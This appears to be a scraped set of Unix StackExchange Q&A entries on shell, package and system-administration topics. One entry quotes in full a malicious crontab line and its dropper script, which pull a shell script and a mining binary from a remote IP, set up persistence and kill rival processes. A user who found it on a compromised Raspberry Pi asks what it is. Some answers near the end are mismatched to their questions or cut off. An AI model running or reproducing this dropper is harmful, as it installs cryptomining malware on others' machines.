544,373 | I'm looking for the zsh equivalent of the bash command history -c , in other words, clear the history for the current session. In zsh history -c returns 1 with an error message history: bad option: -c . Just to clarify, I'm not looking for a way to delete the contents of $HISTFILE , I just want a command to reset the history to the same state it was in when I opened the terminal. Deleting the contents of $HISTFILE does the opposite of what I want: it deletes the history I want to preserve and preserves the history I want to delete (since current session's history would get appended to it, regardless if its contents was previously erased). There is a workaround I use for now, but it's obviously less than ideal: in the current session I set HISTFILE=/dev/null and just close and reopen the terminal. This causes the history of the closed session not be appended to $HISTFILE . However, I'd really like something like history -c from bash, which is much more elegant than having to close and restart the terminal. | To get an empty history, temporarily set HISTSIZE to zero. function erase_history { local HISTSIZE=0; }
erase_history If you want to erase the new history from this shell instance but keep the old history that was loaded initially, empty the history as above then reload the saved history fc -R afterwards. If you don't want the erase_history call to be recorded in the history, you can filter it out in the zshaddhistory hook . function zshaddhistory_erase_history {
[[ $1 != [[:space:]]#erase_history[[:space:]]# ]]
}
zshaddhistory_functions+=(zshaddhistory_erase_history) Deleting one specific history element ( history -d NUM in bash) is another matter. I don't think there's a way other than: Save the history: fc -AI to append to the history file, or fc -WI to overwrite the history file, depending on your history sharing preferences. Edit the history file ( $HISTFILE ). Reload the history file: fc -R . | {
"source": [
"https://unix.stackexchange.com/questions/544373",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/325952/"
]
} |
544,428 | I've noticed a lot of questions and answers and comments expressing disdain for (and sometimes even fear of) writing scripts instead of one-liners. So, I'd like to know: When and why should I write a stand-alone script rather than a "one-liner"? Or vice-versa? What are the use-cases and pros & cons of both? Are some languages (e.g. awk or perl) better suited to one-liners than others (e.g. python)? If so, why? Is it just a matter of personal preference or are there good (i.e. objective) reasons to write one or the other in particular circumstances? What are those reasons? Definitions one-liner : any sequence of commands typed or pasted directly into a shell command-line . Often involving pipelines and/or use of languages such as sed , awk , perl , and/or tools like grep or cut or sort . It is the direct execution on the command-line that is the defining characteristic - the length and formatting is irrelevant. A "one-liner" may be all on one line, or it may have multiple lines (e.g. sh for loop, or embedded awk or sed code, with line-feeds and indentation to improve readability). script : any sequence of commands in any interpreted language(s) which are saved into a file , and then executed. A script may be written entirely in one language, or it may be a shell-script wrapper around multiple "one-liners" using other languages. I have my own answer (which I'll post later), but I want this to become a canonical Q&A on the subject, not just my personal opinion. | Another response based on practical experience. I would use a one-liner if it was "throw away" code that I could write straight at the prompt. For example, I might use this: for h in host1 host2 host3; do printf "%s\t%s\n" "$h" "$(ssh "$h" uptime)"; done I would use a script if I decided that the code was worth saving. At this point I would add a description at the top of the file, probably add some error checking, and maybe even check it into a code repository for versioning. For example, if I decided that checking the uptime of a set of servers was a useful function that I would use again and again, the one-liner above might be expanded to this: #!/bin/bash
# Check the uptime for each of the known set of hosts
########################################################################
#
hosts=(host1 host2 host3)
for h in "${hosts[@]}"
do
printf "%s\t" "$h"
uptime=$(ssh -o ConnectTimeout=5 -n "$h" uptime 2>/dev/null)
printf "%s\n" "${uptime:-(unreachable)}"
done Generalising, one could say One-liner Simple code (i.e. just "a few" statements), written for a specific one-off purpose Code that can be written quickly and easily whenever it is needed Disposable code Script Code that will (probably) be used more than once or twice Complex code requiring more than "a few" statements Code that will need to be maintained by others Code to be understood by others Code to be run unattended (for example, from cron ) I see a fair number of the questions here on unix.SE ask for a one-liner to perform a particular task. Using my examples above, I think that the second is far more understandable than the first, and therefore readers can learn more from it. One solution can be easily derived from the other so in the interests of readability (for future readers) we should probably avoid providing code squeezed into in one line for anything other than the most trivial of solutions. | {
"source": [
"https://unix.stackexchange.com/questions/544428",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/7696/"
]
} |
544,432 | Scenario: In version controlled system configuration based on Puppet, Chef etc., it is required to reproduce a certain system state. This is done by explicitly specifying system package versions. Recently we ran into a problem where certain package versions were missing in the Debian repositories. One example: The "patch" package was required in version 2.7.5-1+deb9u1, but only 2.7.5-1+deb9u2 was available. Another, even more severe example: "linux-headers-4.9.0-9-common" is required (due to the associated kernel being installed) and only "linux-headers-4.9.0-11-common" is available. This makes it impossible to reproduce a certain state of a system. The above packages are just examples (which I in fact encountered). I am interested in understanding and solving the general problem. What is the idea behind these updates, 'vanishing' packages and package versions? Where can I get previous versions (not really old versions, but versions that are a couple of weeks old) of Debian packages? It should be possible to automate the installation process in general way. | Being able to reproduce a specific setup, down to the exact version, is your requirement, not Debian’s. Debian only supports a single version of each binary package in any given release; the counterpart of that is that great care is taken to ensure that package updates in any given release don’t introduce regressions, and when such care isn’t possible, to document that fact. Keeping multiple versions of a given package would only increase the support burden and the test requirements: for example, package maintainers would have to test updated packages against all available versions of the libraries they use, instead of only the currently-supported versions... Packages are only updated in a stable release when really necessary, i.e. to fix a serious bug (including security issues). In the kernel’s case, this sometimes means that the kernel ABI changes, and the package name changes as a result of that (to force rebuilds of dependent packages); there are meta-packages which you can pull in instead of hard-coding the ABI ( linux-image-amd64 , linux-headers-amd64 , etc.). There is however a workaround for your situation: every published source and binary package is archived on snapshot.debian.org . When you create a versioned setup, you can pick the corresponding snapshot (for example, one of the September 2019 snapshots ) and use that as your repository URL: deb https://snapshot.debian.org/archive/debian/20190930T084755Z/ buster main If you end up relying on this, please use a caching mirror of some sort, for example Apt-Cacher NG . This will not only reduce the load on the snapshot server, it will ensure that you have a local copy of all the packages you need. (The situation with regards to source packages is slightly more complex, and the archives do carry multiple versions of some source packages in a given release, because of licensing dependencies. But that’s not relevant here. Strictly speaking, Debian does provide multiple versions of some binaries in supported releases: the current version in the current point release, along with any updates in the security repositories and update repositories; the latter are folded in at the next point release. So maintaining a reproducible, version-controlled system configuration is feasible without resorting to snapshots, as long as you update it every time a point release is made.) | {
"source": [
"https://unix.stackexchange.com/questions/544432",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/332954/"
]
} |
544,811 | I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing. Crontab entry: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh The contents of http://103.219.112.66:8000/i.sh are: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab - My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual. What is this? What should I do? | It is a DDG mining botnet , how it work : exploiting an RCE vulnerability modifying the crontab downloading the appropriate mining program (written with go) starting the mining process DDG: A Mining Botnet Aiming at Database Servers SystemdMiner when a botnet borrows another botnet’s infrastructure U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server) | {
"source": [
"https://unix.stackexchange.com/questions/544811",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/141058/"
]
} |
544,887 | What sed/awk command can I use? Just sort -u will remove all instances Input: abc
abc
def
abc
abc
def Expected output: abc
def
abc
def | That's what the uniq standard command is for. uniq your-file Note that some uniq implementations like GNU uniq will give you the first of a sequence of lines that sort the same (where strcoll() returns 0) as opposed to are byte-to-byte identical (where memcmp() or strcmp() returns 0). To force a byte to byte comparison regardless of the uniq implementation, you can force the locale to C with: LC_ALL=C uniq your-file | {
"source": [
"https://unix.stackexchange.com/questions/544887",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/365562/"
]
} |
545,508 | I'm currently trying to set up an SSH server so that access to it from outside the network is ONLY allowed using an SSH Key and does not allow access to root or by any other username/password combination. At the same time, internal users inside the network, still need to be able to connect to the same system, but expect to log in in the more traditional sense with a user name and password. Users both external & internal will be accessing the system from windows using PuttySSH and the external access will be coming into the system via a port forwarding firewall that will open the source port to the outside world on some arbitrarily chosen high numbered port like 55000 (or what ever the admins decide) The following diagram attempts to show the traffic flows better. I know how to set up the actual login to only use keys, and I know how to deny root, what I don't know is how to separate the two login types. I had considered running two copies of SSHD listening on different ports on the same IP and having two different configurations for each port. I also considered setting up a "match" rule, but I'm not sure if I can segregate server wide configurations using those options. Finally, the external person logging in will always be the same user let's call them "Frank" for the purposes of this question, so "Frank" will only ever be allowed to log in from the external IP, and never actually be sat in front of any system connecting internally, where as every other user of the system will only ever connect internally, and never connect from an external IP. Franks IP that he connects from is a dynamically assigned one but the public IP he is connecting too is static and will never change, the internal IP of the port forwarder like wise will also never change and neither will the internal IP address of the SSH server. Internal clients will always connect from an IP in the private network range that the internal SSH servers IP is part of and is a 16 bit mask EG: 192.168.0.0/16 Is this set up possible, using one config file and one SSH server instance? If so, how do I do it? or Am I much better using 2 running servers with different config? For ref the SSH server is running on Ubuntu 18.04. | So, it turns out the answer was actually way, way simpler than I thought it would be. I do however have to thank '@jeff schaller' for his comments, if it hadn't of been for him I wouldn't have started looking into how the SSH 'Match' configuration works. Anyway The trick is to set your /etc/ssh/sshd_config file up as default to be the configuration you would like to have for the access coming in from the external internet connection. In my case, this meant setting the following PermitRootLogin no
PasswordAuthentication no
UsePAM no By doing this, I'm forcing ALL logins no matter where they come from to need to be key based logins using an SSH key. I then on the windows machines used 'PuttyGen' to generate a public/private key pair which I saved to disk, and an appropriate ssh entry for my "authorized_hosts" file in the external users home directory. I pasted this ssh key into the correct place in my users home folder, then set putty up to use the private (ppk) file generated by PuttyGen for log in and saved the profile. I then saved the profile, and sent that and the ppk key file to the external user using a secure method (Encrypted email with a password protected zip file attached) Once the user had the ppk and profile in their copy of putty and could log in, I then added the following as the last 2 lines on my sshd_config file Match Host server1,server1.internalnet.local,1.2.3.4
PasswordAuthentication yes In the "Match" line I've changed the server names to protect the names of my own servers. Note each server domain is separated by a comma and NO SPACES, this is important. If you put any spaces in it causes SSHD to not load the config and report an error, the 3 matches I have in there do the following: server1 - matches on anyone using just 'server1' with no domain to connect EG: 'fred@server1' server1.internalnet.local - matches on anyone using the fully qualified internal domain name EG: '[email protected]' (NOTE: you will need an internal DNS to make this work correctly) 1.2.3.4 - matches on the specific I.P. address assigned to the SSH server EG: '[email protected]' this can use wild cards, or even better net/mask cidr format EG: 1.2.* or 192.168.1.0/8 if you do use wild cards however, please read fchurca's answer below for some important notes. If any of the patterns provided match the host being accessed, then the one and only single change to be made to the running config is to turn back on the ability to have an interactive password login. You can also put other config directives in here too, and those directives will also be turned back on for internal hosts listed in the match list. do however read this: https://man.openbsd.org/OpenBSD-current/man5/ssh_config.5 carefully, as not every configuration option is allowed to be used inside a match block, I found this out when I tried to "UsePAM yes" to turn PAM authentication back on, only to be told squarely that wasn't allowed. Once you've made your changes, type sshd -T followed by return to test them before attempting to restart the server, it'll report any errors you have. In addition to everything above, I got a lot of help from the following two links too: https://raymii.org/s/tutorials/Limit_access_to_openssh_features_with_the_Match_keyword.html https://www.cyberciti.biz/faq/match-address-sshd_config-allow-root-loginfrom-one_ip_address-on-linux-unix/ | {
"source": [
"https://unix.stackexchange.com/questions/545508",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/72591/"
]
} |
545,699 | Has anyone used the gold linker before? To link a fairly large project, I had to use this as opposed to the GNU ld , which threw up a few errors and failed to link. How is the gold linker able to link large projects where ld fails? Is there some kind of memory trickery somewhere? | The gold linker was designed as an ELF-specific linker, with the intention of producing a more maintainable and faster linker than BFD ld (the “traditional” GNU binutils linker). As a side-effect, it is indeed able to link very large programs using less memory than BFD ld , presumably because there are fewer layers of abstraction to deal with, and because the linker’s data structures map more directly to the ELF format. I’m not sure there’s much documentation which specifically addresses the design differences between the two linkers, and their effect on memory use. There is a very interesting series of articles on linkers by Ian Lance Taylor, the author of the various GNU linkers, which explains many of the design decisions leading up to gold . He writes that The linker I am now working, called gold, on will be my third. It is exclusively an ELF linker. Once again, the goal is speed, in this case being faster than my second linker. That linker has been significantly slowed down over the years by adding support for ELF and for shared libraries. This support was patched in rather than being designed in. (The second linker is BFD ld .) | {
"source": [
"https://unix.stackexchange.com/questions/545699",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/345639/"
]
} |
545,909 | I have a file in the name of Build.number with the content value 012 which I need to increment by +1.
So, I tried this BN=$($cat Build.number)
BN=$(($BN+1))
echo $BN >Build.number but here I am getting the value 11 when I am expecting 013 .
Can anyone help me? | The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)
echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number | {
"source": [
"https://unix.stackexchange.com/questions/545909",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376375/"
]
} |
545,914 | I have the following input file H1
C1
C2
C3
H2
C4
.
.
. I would like to obtain the following output format only with the characters and not the numbers H
C
C
C
H
C
.
.
. | The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)
echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number | {
"source": [
"https://unix.stackexchange.com/questions/545914",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/298739/"
]
} |
547,968 | -b, --before The separator is attached to the beginning of the record that it
precedes in the file. And I can't understand the following output: $ echo -e "Hello\nNew\nWorld\n!" > file
$ tac file
!
World
New
Hello
$ tac -b file
!
World
NewHello Why there is no newline between New and Hello ? | tac works with records and their separators, attached , by default after the corresponding record. This is somewhat counter-intuitive compared to other record-based tools (such as AWK) where separators are detached. With -b , the records, with their newline attached, are as follows (in original order): Hello \nNew \nWorld \n! \n Output in reverse, this becomes \n\n!\nWorld\nNewHello which corresponds to the output you see. Without -b , the records, with their newline attached, are as follows: Hello\n New\n World\n !\n Output in reverse, this becomes !\nWorld\nNew\nHello\n | {
"source": [
"https://unix.stackexchange.com/questions/547968",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/223016/"
]
} |
548,002 | How can I use, preferably a single chmod command, which will allow any user to create a file in a directory but only the owner of their file (the user who created it) can delete their own file but no one else's in that directory. I was thinking to use: chmod 755 directory As the user can create a file and delete it, but won't that allow the user to delete other people's files? I only want the person who created the file to be able to delete their own file. So, anyone can make a file but only the person who created a file can delete that file (in the directory). | The sticky bit can do more or less what you want. From man 1 chmod : The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type. For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp. That is, the sticky bit's presence on a directory only allows contained files to be renamed or deleted if the user is either the file's owner or the containing directory's owner (or the user is root). You can apply the sticky bit (which is represented by octal 1000, or t ) like so: # instead of your chmod 755
chmod 1777 directory
# or, to add the bit to an existing directory
chmod o+t directory | {
"source": [
"https://unix.stackexchange.com/questions/548002",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/322247/"
]
} |
548,700 | There is a thread that talks about ls "*" not showing any files, but I actually wonder why the simple ls * command doesn't output anything in my terminal other than ls: invalid option -- '|'
Try 'ls --help' for more information. while ls will list all the files in the current directories as 1 ferol readme.txt
2 fichier sarku
2018 GameShell Templates
22223333 '-|h4k3r|-' test
3 hs_err_pid2301.log test2
CA.txt important.top.secret.txt toto.text
CA.zip JavaBlueJProject tp1_inf1070
countryInfo.txt liendur 'tp1_inf1070_A19(2) (1)'
currency liensymbolique tp1_inf1070_A19.tar
curreny LOL Videos
Desktop Longueuil 'VirtualBox VMs'
Documents Music words
douffos numbers Zip.zip
Downloads Pictures
examples.desktop Public Any ideas as to why the globbing doesn't take effect here? I'm on Ubuntu, working in the terminal, I don't know if it makes a difference. Thanks. | When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames. | {
"source": [
"https://unix.stackexchange.com/questions/548700",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/378955/"
]
} |
548,704 | I'm trying diffeent .xstartup files to have KDE up when using thightvncserve, but I keep on seeing the empty screen. Any help? current .xstartup is: #!/bin/sh
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session &
startkde & | When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames. | {
"source": [
"https://unix.stackexchange.com/questions/548704",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/378957/"
]
} |
549,008 | I want to make a table in vim. Making a horizontal line is easy ______________________________ For the vertical I use this yes "|" | head -10 But the result is bad |
|
|
|
|
|
|
|
| I want something contiguous like the horizontal line. How can I do this? | If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono): | {
"source": [
"https://unix.stackexchange.com/questions/549008",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/80389/"
]
} |
549,012 | I just bought a new HP laptop just for the purpose of installing and learning Kali linux. It had originally windows 10 installed in it. I downloaded and installed the latest version of kali linux. Everything seems to be good and working but when I tried to connect to internet, I can't to it. I can just connect using wired connection. For wireless connection, it says no wifi adapter found. I did not install kali on any virtual machine, my pc is a pure kali linux now straight booted in the drive. When I type iwconfig in the terminal, it just shows me eth0 and lo. It doesn't show wlan0. I tried looking for solution for a whole day now. I tried a method, "download compact wireless" that everyone was showing, I was able to get wlan0 and wlan1, but now the problem is it doesn't detect any wifi. Also when I reboot my laptop, it is gone and I have to do it again, its not saved. I have also realised that bluetooth is also not working. However, the download compact wireless method seems to fix the bluetooth, but ita gone at restart. There are people who said I need to get an adapter, but the laptop should have build in wifi card right? And I directly booted up in the machine, not in any virtual box, so do I really need to buy one? Whats the point of me buying a new laptop just for Kali? Please help me. | If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono): | {
"source": [
"https://unix.stackexchange.com/questions/549012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/379274/"
]
} |
550,415 | I want to write a Bash script, which checks if all directories, stored in an array, exist. If not, the script should create it. Is this a correct way to do it? array1=(
/apache
/apache/bin
/apache/conf
/apache/lib
/www
/www/html
/www/cgi-bin
/www/ftp
)
if [ ! -d “$array1” ]; then
mkdir $array1
else
break
fi | Just use: mkdir -p -- "${array1[@]}" That will also create intermediary directory components if need be so your array can also be shortened to only include the leaf directories: array1=(
/apache/bin
/apache/conf
/apache/lib
/www/html
/www/cgi-bin
/www/ftp
) Which you could also write: array1=(
/apache/{bin,conf,lib}
/www/{html,cgi-bin,ftp}
) The [[ -d ... ]] || mkdir ... type of approaches in general introduce TOCTOU race conditions and are better avoided wherever possible (though in this particular case it's unlikely to be a problem). | {
"source": [
"https://unix.stackexchange.com/questions/550415",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/380533/"
]
} |
550,951 | I want to test some physical links in a setup. The software tooling that I can use to test this require a block device to read/write from/to. The block devices I have available can't saturate the physical link so I can't fully test it. I know I can setup a virtual block device which is backed by a file. So my idea was to somehow setup a virtual block device to /dev/null but the problem is of course that I can't read from it. Is there a way I could setup a virtual block device that writes to /dev/null but just returns always zero when read? Thank you for any help! | https://wiki.gentoo.org/wiki/Device-mapper#Zero See Documentation/device-mapper/zero.txt for usage. This target has no target-specific parameters. The "zero" target create that functions similarly to /dev/zero: All reads return binary zero, and all writes are discarded. Normally used in tests [...] This creates a 1GB (1953125-sector) zero target: root# dmsetup create 1gb-zero --table '0 1953125 zero' | {
"source": [
"https://unix.stackexchange.com/questions/550951",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/350749/"
]
} |
552,188 | I would like to remove empty lines from the beginning and the end of file, but not remove empty lines between non-empty lines in the middle. I think sed or awk would be the solution. Source: 1:
2:
3:line1
4:
5:line2
6:
7:
8: Output: 1:line1
2:
3:line2 | Try this, To remove blank lines from the begin of a file: sed -i '/./,$!d' filename To remove blank lines from the end of a file: sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' file To remove blank lines from begin and end of a file: sed -i -e '/./,$!d' -e :a -e '/^\n*$/{$d;N;ba' -e '}' file From man sed , -e script, --expression=script -> add the script to the commands to be executed b label -> Branch to label; if label is omitted, branch to end of script. a -> Append text after a line (alternative syntax). $ -> Match the last line. n N -> Add a newline to the pattern space, then append the next line of input to the pattern space. If there is no more input then sed exits without processing any more commands. | {
"source": [
"https://unix.stackexchange.com/questions/552188",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/215365/"
]
} |
552,436 | :>filename.txt For example: root@box$ dd if=/dev/zero of=file.txt count=1024 bs=1024
1024+0 records in
1024+0 records out
1048576 bytes (1.0 MB, 1.0 MiB) copied, 0.00536175 s, 196 MB/s
root@box$ ll
total 1024
-rw-r--r-- 1 root root 1048576 Nov 15 14:40 file.txt
root@box$ :>file.txt
root@box$ ll
total 0
-rw-r--r-- 1 root root 0 Nov 15 14:40 file.txt Is this different from an rm ? Does it operate faster or slower than other similar means of zeroing a file or deleting it? | As you have discovered, this just empties the file contents (it truncates the file); that is different from rm as rm would actually remove the file altogether. Additionally, :>file.txt will actually create the file if it didn't already exist. : is a "do nothing command" that will exit with success and produce no output, so it's simply a short method to empty a file. In most shells, you could simply do >file.txt to get the same result. It also could be marginally faster than other methods such as echo >file.txt as echo could potentially be an external command. Additionally, echo >file.txt would put a blank line in file.txt where :>file.txt would make the file have no contents whatsoever. | {
"source": [
"https://unix.stackexchange.com/questions/552436",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/137794/"
]
} |
552,707 | I renewed my gpg key pair, but I am still receiving the following error from gpg. gpg: WARNING: Your encryption subkey expires soon.
gpg: You may want to change its expiration date too. How can I renew the subkey? | List your keys. $ gpg --list-keys
...
-------------------------------
pub rsa2048 2019-09-07 [SC] [expires: 2020-11-15]
AF4RGH94ADC84
uid [ultimate] Jill Doe (CX) <[email protected]>
sub rsa2048 2019-09-07 [E] [expired: 2019-09-09]
pub rsa2048 2019-12-13 [SC] [expires: 2020-11-15]
7DAA371777412
uid [ultimate] Jill Doe <[email protected]>
-------------------------------
... We want to edit key AF4RGH94ADC84.
The subkey is the second one in the list that is named ssb $ gpg --edit-key AF4RGH94ADC84
gpg> list
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> So we want to edit the first subkey (ssb) ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> When you select key (1), you should see the * next to it such as ssb* . Then you can set the expiration and then save. gpg> key 1
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
gpg> expire
...
Changing expiration time for a subkey.
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 2y
Key expires at Wed 9 Sep 16:20:33 2021 GMT
Is this correct? (y/N) y
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expires: 2021-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
...
gpg> save Don't forget to save the changes before quitting! | {
"source": [
"https://unix.stackexchange.com/questions/552707",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/19319/"
]
} |
552,713 | I have a big file counting genotype input file. Here is the first few lines: LocusID f nAlleles x y
2L:8347 1 2 44.3166 -12.2373
2L:8347 1 2 39.2667 -6.8333
2L:31184 1 2 39.2667 -6.8333
2L:31184 1 2 39.2667 -6.8333
2L:42788 1 2 39.2667 -6.8333
2L:42788 1 2 39.2667 -6.8333
2L:42887 1 2 39.2667 -6.8333
2L:42887 1 2 39.2667 -6.8333 The first column is locus ID and for each locus I have two rows with identical locus IDs. I want to keep only those which column x and column y are not qual for each locus. here is my desired output from the above example out
2L:8347 1 2 44.3166 -12.2373
2L:8347 1 2 39.2667 -6.8333 Any idea how I can do it? | List your keys. $ gpg --list-keys
...
-------------------------------
pub rsa2048 2019-09-07 [SC] [expires: 2020-11-15]
AF4RGH94ADC84
uid [ultimate] Jill Doe (CX) <[email protected]>
sub rsa2048 2019-09-07 [E] [expired: 2019-09-09]
pub rsa2048 2019-12-13 [SC] [expires: 2020-11-15]
7DAA371777412
uid [ultimate] Jill Doe <[email protected]>
-------------------------------
... We want to edit key AF4RGH94ADC84.
The subkey is the second one in the list that is named ssb $ gpg --edit-key AF4RGH94ADC84
gpg> list
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> So we want to edit the first subkey (ssb) ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> When you select key (1), you should see the * next to it such as ssb* . Then you can set the expiration and then save. gpg> key 1
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
gpg> expire
...
Changing expiration time for a subkey.
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 2y
Key expires at Wed 9 Sep 16:20:33 2021 GMT
Is this correct? (y/N) y
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
